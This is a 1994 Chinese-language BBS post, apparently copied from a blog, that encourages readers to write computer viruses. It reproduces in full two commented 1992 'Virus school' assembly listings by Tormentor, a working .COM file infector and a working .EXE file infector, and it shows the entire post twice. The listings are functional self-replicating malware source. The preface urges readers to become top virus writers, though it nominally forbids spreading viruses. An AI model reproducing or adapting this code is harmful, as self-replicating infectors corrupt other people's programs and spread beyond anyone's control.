Hitech 的話:
在你開始嘗試驚奇的電腦病毒創作以前,你應該對組合語言已有基本的認識,如果你
完全不會組合語言,先去找本80x86或680x0(如果你想玩Macintosh病毒的話)組合語言
的書來研讀,等你有一定的基礎了,再回過頭來學習電腦病毒的技術(包含寫毒、解毒、
和防毒原理);如果你已具備這些條件,我個人再要求你開始對C(或C++)語言、Windows
程式設計(包含 Microsoft Windows 和 Unix 下的 X-Window)、和 Unix 作業系統下
功夫,這是目前病毒界的大趨勢,如果你想成為未來世界上頂尖的病毒高手,聽我的話
絕不會錯的。
如果你沒機會使用網路上的工作站電腦,現在開始把你的PC擴增到至少 8M 的 RAM,
300M 以上的硬碟,486 DX 以上的主機板,然後想辦法去得到免費的 Linux和X-Free86
來安裝,開始把Unix玩弄於股掌之間吧!!
在開始研究病毒以前,首先,你得擁有一本詳細的 PC Interrupt 手冊以供隨時查閱
;如果你沒錢買的話,你可以到 Internet 上 的 FTP 站 nctuccca.edu.tw//pub/PC/
simtel/info 下 或 NeXT BBS 抓 inter41a.zip、inter41b.zip、和 inter41c.zip 這
三個檔案,這份由 Ralf Brown 編的電子版技術文件資料相當詳盡。
以下兩篇由 Tormentor 所寫的教學病毒程式相當簡易,可當做那些想一窺病毒堂奧
卻不得其門而入的初學者一理想的教材,好好加油吧,希望有一天你自己能寫出一隻很
棒的病毒或防毒程式,如果你還能在電腦病毒上模擬出生物病毒的行為(比如說性狀轉
變(transforamtion) 的發生),我跟你說,你可以發表論文了!:-)
有一點我要你嚴格遵守,絕對不可以放毒去害人,寫毒本身沒有罪,但是到處散播病
毒就不應該了,你可以把你的作品放到 NeXT BBS (TEL:(02)305-7135、(02)301-9620)
與所有的病毒玩家分享,或是把它設計成鎖在 Virtual Computer (虛擬電腦)之中。請
謹記我的話,否則你將與世界上各大病毒組織為敵。
好好努力吧,期待有一天你成為台灣病毒組織中的一名大將!!
Hitech Pro // I.C.G 於 1994.7.25
Internet: rfchen@ccms.ntu.edu.tw
90郵網: 孟水劍 (NeXT ID: hitech pro)
======================================
【2】病毒小學 ─ 課程(一) 啟智教育
發信人: hitech@pro (Hitech Pro), 信區: virus
標 題: 病毒小學 ─ 課程(一) 啟智教育
發信站: Intellectual Creativity Group (Wed Jul 27 20:00:00 1994)
轉信站: phoenix!bbsroute!news.csie.nctu!netnews.ntu!pro!hitech
;
; Virus school, lession 1 (c) 1992 Tormentor [Demoralized Youth]
;
; This is the first lession on how to make an own virus.
; Hope you'll learn something of it...
; To be compiled with TASM 3.0 or higher.
;
; This virus is quite dumb and 'noisy'
; It updates the filedate and time, changes DTA before execution causing
; some progs to believe they are executed with parameters...
; But this should only be a 'raw' virus that you can develop.
; Certain program may hang, so i recommend you not to spread to geeks
; since there is MANY better viruses to use for such nice purpose.
;
; If you want to conntact me or other virus-writers call me on my board:
; Swedish Virus Laboratory +46-3191-9393
;
; Greetings to All virus-writers!
;
.model tiny
.radix 16
.code
Virus_Lenght EQU Virus_End-Virus_Start ; Lenght of virus.
org 100
dummy_code: db 'M' ; Mark file as infected.
db 3 DUP(90) ; This is to simulate a infected prog.
; Not included in virus-code.
Virus_Start: call where_we_are ; Now we call the next bytes, just to
; know what address virus lies on.
where_we_are: pop si ; Since the virus-code's address will
; differ from victim to victim.
; a POP SI after a call will give us
the
; address which equals to
'where_we_are'
; Very important.
;-----------------------------------------------------------------------
; Now we have to put back the original 4 bytes in the host program, so
; we can return control to it later:
add si,_4first_bytes-where_we_are
mov di,100
cld
movsw
movsw
;------------------------------------------------------------------------
; We have to use SI as a reference since files differ in size thus making
; virus to be located at different addresses.
sub si,_4first_bytes-Virus_Start+4
;------------------------------------------------------------------------
; Now we just have to find victims, we will look for ALL .COM files in
; the current directory.
mov ah,4e ; We start to look for a *.COM file
look4victim: mov dx,offset file_match-Virus_Start
add dx,si
int 21
jc no_victim_found ; If no *.COM files was found.
mov ax,3d02 ; Now we open the file.
mov dx,9e ; The found victims name is at ds:009e
int 21 ; in DTA.
jc cant_open_file ; If file couldn't be open.
xchg ax,bx ; Save filehandle in bx
; (we could use MOV BX,AX but we saves one byte by using xchg )
mov ah,3f ; Now we read the first 4 bytes
mov cx,4 ; from the victim -> buffer
mov dx,offset _4first_bytes-Virus_Start
add dx,si
; We will then overwrite them with
int 21 ; a JMP XXXX to virus-code at end.
jc read_error
cmp byte ptr ds:[si+_4first_bytes-Virus_Start],'M'
jz sick_or_EXE ; Check if infected OR *.EXE
; Almost all EXE files starts with 'M' and we mark the infected files by
; starting with 'M' which equals to DEC BP
; Now we just have to have one check instead of 2 (infected and *.EXE)
mov ax,4202 ; Position file-pointer to point at
xor cx,cx ; End-of-File.
xor dx,dx ; Any writing to file will now APPEND
it
int 21 ; Returns AX -> at end.
sub ax,4 ; Just for the JMP structure.
mov word ptr ds:[_4new_bytes+2],ax
; Build new JMP XXXX to virus.
; ( logic: JMP AX )
mov ah,40 ; Append file with virus code.
mov cx,offset Virus_Lenght
; File-size will increase with
mov dx,si ; Virus_Lenght.
int 21
jc write_error
mov ax,4200 ; Position file-pointer to begin of
file
xor cx,cx ; So we can change the first 3 bytes
xor dx,dx ; to JMP to virus.
int 21
mov ah,40 ; Write new 3 bytes.
mov cx,4 ; After this, executing the file will
mov dx,offset _4new_bytes-Virus_Start
add dx,si
; result in virus-code executing
before
int 21 ; original code.
; (And more files will be infected)
jc write_error
mov ah,3e ; Close file, now file is infected.
int 21 ; Dos function 3E (close handle)
Sick_or_EXE: mov ah,4f ; Well, file is infected. Now let's
jmp look4victim ; find another victim...
write_error: ; Here you can test whats went wrong.
read_error: ; This is just for debugging purpose.
cant_open_file: ; These entries are equal to eachother
no_victim_found: ; but could be changed if you need to test something.
mov ax,100 ; Every thing is put back in memory,
push ax ; lets us RET back to start of program
ret ; and execute the original program.
notes db ' (c) 1992 Tormentor ,Swedish Virus Laboratory'
db ' / Demoralized Youth / '
file_match db '*.COM',0 ; Pattern to search for.
; Don't forget to end with 0 !
_4first_bytes: ret ; Here we save the 4 first org. bytes
db 3 DUP(0)
; We have a ret here since this file isn't a REAL infection.
_4new_bytes db 'M',0E9, 00, 00 ; Here we build the 4 new org. bytes
; so our virus-code will be run first.
Virus_End EQU $
end dummy_code
=======================================
【3】病毒小學 ─ 課程(二) 改造教育
發信人: hitech@pro (Hitech Pro), 信區: virus
標 題: 病毒小學 ─ 課程(二) 改造教育
發信站: Intellectual Creativity Group (Wed Jul 27 20:00:00 1994)
轉信站: phoenix!bbsroute!news.csie.nctu!netnews.ntu!pro!hitech
;
; Virus Lession #2 'How to make a non-resident EXE infector'
;
; (c) 1992 Tormentor // Demoralized Youth
;
; Well, I had not time to comment this code as much as I wanted to,
; but here you are.
; What can be hard to understand is the .EXE header changes, but if
; you look at the description on the header (ex: Norton guide Tech. Ref)
; you'll understand...
; Anyway, feel free to use this example and if you have any questions
; or anything call my board: Swedish Virus Labratory +46-3191-9393
;
; Greetings to all virus-writers!
;
; /Tormentor
;
.model tiny
.radix 16
.code
Virus_Lenght EQU Virus_End-Virus_Start ; Lenght of virus.
org 100
Virus_Start: call where_we_are
where_we_are: pop si
sub si,where_we_are-Virus_Start
mov ax,es
add ax,10
add ax,cs:[si+Exe_header-Virus_Start+16]
push ax
push cs:[si+Exe_header-Virus_Start+14]
push ds
push cs
pop ds
mov ah,1a
mov dx,offset Own_dta-Virus_Start
add dx,si
int 21
mov ah,4e ; We start to look for a *.EXE file
look4victim: mov dx,offset file_match-Virus_Start
add dx,si
int 21
jnc cont2
jmp no_victim_found ; If no *.EXE files was found.
cont2: mov ax,3d02
mov dx,Own_dta-Virus_Start+1e
add dx,si
int 21
jnc cont1
jmp cant_open_file
cont1: xchg ax,bx
mov ah,3f
mov cx,1c
mov dx,offset Exe_header-Virus_Start
add dx,si
int 21
jc read_error
cmp byte ptr ds:[si+Exe_header-Virus_Start],'M'
jnz no_exe ; !!! Some EXEs starts with ZM !!!
cmp word ptr ds:[si+Exe_header-Virus_Start+12],'DY'
jz infected
mov ax,4202 ; Go EOF
xor cx,cx
xor dx,dx
int 21
push dx
push ax
mov ah,40 ; Write virus to EOF.
mov cx,Virus_Lenght
mov dx,si
int 21
mov ax,4202 ; Get NEW filelenght.
xor cx,cx
xor dx,dx
int 21
mov cx,200
div cx
inc ax
mov word ptr ds:[Exe_header-Virus_Start+2+si],dx
mov word ptr ds:[Exe_header-Virus_Start+4+si],ax
pop ax
pop dx
mov cx,10
div cx
sub ax,word ptr ds:[Exe_header-Virus_Start+8+si]
mov word ptr ds:[Exe_header-Virus_Start+16+si],ax
mov word ptr ds:[Exe_header-Virus_Start+14+si],dx
mov word ptr ds:[Exe_header-Virus_Start+12+si],'DY'
mov ax,4200 ; Position file-pointer to begin of
file
xor cx,cx
xor dx,dx
int 21
mov ah,40 ; Write header
mov cx,1c
mov dx,offset Exe_header-Virus_Start
add dx,si
int 21
jc write_error
no_exe:
infected:
mov ah,3e
int 21
Sick_or_EXE: mov ah,4f
jmp look4victim
write_error: ; Here you can test whats went wrong.
read_error: ; This is just for debugging purpose.
cant_open_file: ; These entries are equal to eachother
no_victim_found: ; but could be changed if you need to test something.
pop ds
retf
file_match db '*.EXE',0 ; Pattern to search for.
; Don't forget to end with 0 !
Exe_header db 16 DUP(0)
dw 0fff0 ; Adjustment just for this COM-file.
db 4 DUP(0)
notes db '(c) 1992 Tormentor / Demoralized Youth ',0a,0d
db 'Rather first in hell, than second in heaven.'
Own_Dta db 02bh DUP(0)
Virus_End EQU $
end Virus_Start
在你開始嘗試驚奇的電腦病毒創作以前,你應該對組合語言已有基本的認識,如果你
完全不會組合語言,先去找本80x86或680x0(如果你想玩Macintosh病毒的話)組合語言
的書來研讀,等你有一定的基礎了,再回過頭來學習電腦病毒的技術(包含寫毒、解毒、
和防毒原理);如果你已具備這些條件,我個人再要求你開始對C(或C++)語言、Windows
程式設計(包含 Microsoft Windows 和 Unix 下的 X-Window)、和 Unix 作業系統下
功夫,這是目前病毒界的大趨勢,如果你想成為未來世界上頂尖的病毒高手,聽我的話
絕不會錯的。
如果你沒機會使用網路上的工作站電腦,現在開始把你的PC擴增到至少 8M 的 RAM,
300M 以上的硬碟,486 DX 以上的主機板,然後想辦法去得到免費的 Linux和X-Free86
來安裝,開始把Unix玩弄於股掌之間吧!!
在開始研究病毒以前,首先,你得擁有一本詳細的 PC Interrupt 手冊以供隨時查閱
;如果你沒錢買的話,你可以到 Internet 上 的 FTP 站 nctuccca.edu.tw//pub/PC/
simtel/info 下 或 NeXT BBS 抓 inter41a.zip、inter41b.zip、和 inter41c.zip 這
三個檔案,這份由 Ralf Brown 編的電子版技術文件資料相當詳盡。
以下兩篇由 Tormentor 所寫的教學病毒程式相當簡易,可當做那些想一窺病毒堂奧
卻不得其門而入的初學者一理想的教材,好好加油吧,希望有一天你自己能寫出一隻很
棒的病毒或防毒程式,如果你還能在電腦病毒上模擬出生物病毒的行為(比如說性狀轉
變(transforamtion) 的發生),我跟你說,你可以發表論文了!:-)
有一點我要你嚴格遵守,絕對不可以放毒去害人,寫毒本身沒有罪,但是到處散播病
毒就不應該了,你可以把你的作品放到 NeXT BBS (TEL:(02)305-7135、(02)301-9620)
與所有的病毒玩家分享,或是把它設計成鎖在 Virtual Computer (虛擬電腦)之中。請
謹記我的話,否則你將與世界上各大病毒組織為敵。
好好努力吧,期待有一天你成為台灣病毒組織中的一名大將!!
Hitech Pro // I.C.G 於 1994.7.25
Internet: rfchen@ccms.ntu.edu.tw
90郵網: 孟水劍 (NeXT ID: hitech pro)
======================================
【2】病毒小學 ─ 課程(一) 啟智教育
發信人: hitech@pro (Hitech Pro), 信區: virus
標 題: 病毒小學 ─ 課程(一) 啟智教育
發信站: Intellectual Creativity Group (Wed Jul 27 20:00:00 1994)
轉信站: phoenix!bbsroute!news.csie.nctu!netnews.ntu!pro!hitech
;
; Virus school, lession 1 (c) 1992 Tormentor [Demoralized Youth]
;
; This is the first lession on how to make an own virus.
; Hope you'll learn something of it...
; To be compiled with TASM 3.0 or higher.
;
; This virus is quite dumb and 'noisy'
; It updates the filedate and time, changes DTA before execution causing
; some progs to believe they are executed with parameters...
; But this should only be a 'raw' virus that you can develop.
; Certain program may hang, so i recommend you not to spread to geeks
; since there is MANY better viruses to use for such nice purpose.
;
; If you want to conntact me or other virus-writers call me on my board:
; Swedish Virus Laboratory +46-3191-9393
;
; Greetings to All virus-writers!
;
.model tiny
.radix 16
.code
Virus_Lenght EQU Virus_End-Virus_Start ; Lenght of virus.
org 100
dummy_code: db 'M' ; Mark file as infected.
db 3 DUP(90) ; This is to simulate a infected prog.
; Not included in virus-code.
Virus_Start: call where_we_are ; Now we call the next bytes, just to
; know what address virus lies on.
where_we_are: pop si ; Since the virus-code's address will
; differ from victim to victim.
; a POP SI after a call will give us
the
; address which equals to
'where_we_are'
; Very important.
;-----------------------------------------------------------------------
; Now we have to put back the original 4 bytes in the host program, so
; we can return control to it later:
add si,_4first_bytes-where_we_are
mov di,100
cld
movsw
movsw
;------------------------------------------------------------------------
; We have to use SI as a reference since files differ in size thus making
; virus to be located at different addresses.
sub si,_4first_bytes-Virus_Start+4
;------------------------------------------------------------------------
; Now we just have to find victims, we will look for ALL .COM files in
; the current directory.
mov ah,4e ; We start to look for a *.COM file
look4victim: mov dx,offset file_match-Virus_Start
add dx,si
int 21
jc no_victim_found ; If no *.COM files was found.
mov ax,3d02 ; Now we open the file.
mov dx,9e ; The found victims name is at ds:009e
int 21 ; in DTA.
jc cant_open_file ; If file couldn't be open.
xchg ax,bx ; Save filehandle in bx
; (we could use MOV BX,AX but we saves one byte by using xchg )
mov ah,3f ; Now we read the first 4 bytes
mov cx,4 ; from the victim -> buffer
mov dx,offset _4first_bytes-Virus_Start
add dx,si
; We will then overwrite them with
int 21 ; a JMP XXXX to virus-code at end.
jc read_error
cmp byte ptr ds:[si+_4first_bytes-Virus_Start],'M'
jz sick_or_EXE ; Check if infected OR *.EXE
; Almost all EXE files starts with 'M' and we mark the infected files by
; starting with 'M' which equals to DEC BP
; Now we just have to have one check instead of 2 (infected and *.EXE)
mov ax,4202 ; Position file-pointer to point at
xor cx,cx ; End-of-File.
xor dx,dx ; Any writing to file will now APPEND
it
int 21 ; Returns AX -> at end.
sub ax,4 ; Just for the JMP structure.
mov word ptr ds:[_4new_bytes+2],ax
; Build new JMP XXXX to virus.
; ( logic: JMP AX )
mov ah,40 ; Append file with virus code.
mov cx,offset Virus_Lenght
; File-size will increase with
mov dx,si ; Virus_Lenght.
int 21
jc write_error
mov ax,4200 ; Position file-pointer to begin of
file
xor cx,cx ; So we can change the first 3 bytes
xor dx,dx ; to JMP to virus.
int 21
mov ah,40 ; Write new 3 bytes.
mov cx,4 ; After this, executing the file will
mov dx,offset _4new_bytes-Virus_Start
add dx,si
; result in virus-code executing
before
int 21 ; original code.
; (And more files will be infected)
jc write_error
mov ah,3e ; Close file, now file is infected.
int 21 ; Dos function 3E (close handle)
Sick_or_EXE: mov ah,4f ; Well, file is infected. Now let's
jmp look4victim ; find another victim...
write_error: ; Here you can test whats went wrong.
read_error: ; This is just for debugging purpose.
cant_open_file: ; These entries are equal to eachother
no_victim_found: ; but could be changed if you need to test something.
mov ax,100 ; Every thing is put back in memory,
push ax ; lets us RET back to start of program
ret ; and execute the original program.
notes db ' (c) 1992 Tormentor ,Swedish Virus Laboratory'
db ' / Demoralized Youth / '
file_match db '*.COM',0 ; Pattern to search for.
; Don't forget to end with 0 !
_4first_bytes: ret ; Here we save the 4 first org. bytes
db 3 DUP(0)
; We have a ret here since this file isn't a REAL infection.
_4new_bytes db 'M',0E9, 00, 00 ; Here we build the 4 new org. bytes
; so our virus-code will be run first.
Virus_End EQU $
end dummy_code
=======================================
【3】病毒小學 ─ 課程(二) 改造教育
發信人: hitech@pro (Hitech Pro), 信區: virus
標 題: 病毒小學 ─ 課程(二) 改造教育
發信站: Intellectual Creativity Group (Wed Jul 27 20:00:00 1994)
轉信站: phoenix!bbsroute!news.csie.nctu!netnews.ntu!pro!hitech
;
; Virus Lession #2 'How to make a non-resident EXE infector'
;
; (c) 1992 Tormentor // Demoralized Youth
;
; Well, I had not time to comment this code as much as I wanted to,
; but here you are.
; What can be hard to understand is the .EXE header changes, but if
; you look at the description on the header (ex: Norton guide Tech. Ref)
; you'll understand...
; Anyway, feel free to use this example and if you have any questions
; or anything call my board: Swedish Virus Labratory +46-3191-9393
;
; Greetings to all virus-writers!
;
; /Tormentor
;
.model tiny
.radix 16
.code
Virus_Lenght EQU Virus_End-Virus_Start ; Lenght of virus.
org 100
Virus_Start: call where_we_are
where_we_are: pop si
sub si,where_we_are-Virus_Start
mov ax,es
add ax,10
add ax,cs:[si+Exe_header-Virus_Start+16]
push ax
push cs:[si+Exe_header-Virus_Start+14]
push ds
push cs
pop ds
mov ah,1a
mov dx,offset Own_dta-Virus_Start
add dx,si
int 21
mov ah,4e ; We start to look for a *.EXE file
look4victim: mov dx,offset file_match-Virus_Start
add dx,si
int 21
jnc cont2
jmp no_victim_found ; If no *.EXE files was found.
cont2: mov ax,3d02
mov dx,Own_dta-Virus_Start+1e
add dx,si
int 21
jnc cont1
jmp cant_open_file
cont1: xchg ax,bx
mov ah,3f
mov cx,1c
mov dx,offset Exe_header-Virus_Start
add dx,si
int 21
jc read_error
cmp byte ptr ds:[si+Exe_header-Virus_Start],'M'
jnz no_exe ; !!! Some EXEs starts with ZM !!!
cmp word ptr ds:[si+Exe_header-Virus_Start+12],'DY'
jz infected
mov ax,4202 ; Go EOF
xor cx,cx
xor dx,dx
int 21
push dx
push ax
mov ah,40 ; Write virus to EOF.
mov cx,Virus_Lenght
mov dx,si
int 21
mov ax,4202 ; Get NEW filelenght.
xor cx,cx
xor dx,dx
int 21
mov cx,200
div cx
inc ax
mov word ptr ds:[Exe_header-Virus_Start+2+si],dx
mov word ptr ds:[Exe_header-Virus_Start+4+si],ax
pop ax
pop dx
mov cx,10
div cx
sub ax,word ptr ds:[Exe_header-Virus_Start+8+si]
mov word ptr ds:[Exe_header-Virus_Start+16+si],ax
mov word ptr ds:[Exe_header-Virus_Start+14+si],dx
mov word ptr ds:[Exe_header-Virus_Start+12+si],'DY'
mov ax,4200 ; Position file-pointer to begin of
file
xor cx,cx
xor dx,dx
int 21
mov ah,40 ; Write header
mov cx,1c
mov dx,offset Exe_header-Virus_Start
add dx,si
int 21
jc write_error
no_exe:
infected:
mov ah,3e
int 21
Sick_or_EXE: mov ah,4f
jmp look4victim
write_error: ; Here you can test whats went wrong.
read_error: ; This is just for debugging purpose.
cant_open_file: ; These entries are equal to eachother
no_victim_found: ; but could be changed if you need to test something.
pop ds
retf
file_match db '*.EXE',0 ; Pattern to search for.
; Don't forget to end with 0 !
Exe_header db 16 DUP(0)
dw 0fff0 ; Adjustment just for this COM-file.
db 4 DUP(0)
notes db '(c) 1992 Tormentor / Demoralized Youth ',0a,0d
db 'Rather first in hell, than second in heaven.'
Own_Dta db 02bh DUP(0)
Virus_End EQU $
end Virus_Start
全站熱搜
留言列表
